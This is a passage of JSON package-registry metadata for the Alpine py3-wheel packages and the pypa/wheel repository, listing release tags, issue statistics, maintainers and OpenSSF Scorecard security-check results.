tml_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:43.825Z","dependent_packages_count":4,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":6.546004918963234,"stargazers_count":9.03701835151668,"forks_count":7.214479409724412,"average":5.699375670051081},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.15","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel/codemeta","maintainers":[{"uuid":"antoine.fontaine@epfl.ch","login":null,"name":"Antoine Fontaine","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","packages_count":18,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","role":null,"created_at":"2023-02-01T14:49:27.142Z","updated_at":"2023-02-01T14:49:27.142Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/maintainers/antoine.fontaine@epfl.ch/packages"}],"registry":{"name":"alpine-v3.15","url":"https://pkgs.alpinelinux.org/packages?branch=v3.15","ecosystem":"alpine","default":false,"packages_count":15857,"maintainers_count":287,"namespaces_count":2,"keywords_count":2466,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":786},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.684Z","updated_at":"2026-06-10T05:17:43.390Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/namespaces"}},{"id":8663604,"name":"py3-wheel-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-wheel","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2023-11-28T22:45:22.000Z","latest_release_published_at":"2023-11-28T22:45:22.000Z","latest_release_number":"0.42.0-r0","last_synced_at":"2026-04-02T17:43:11.072Z","created_at":"2023-12-20T10:00:44.867Z","updated_at":"2026-04-02T17:43:11.072Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.19/main/x86_64/py3-wheel-pyc","install_command":"apk add py3-wheel-pyc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","depen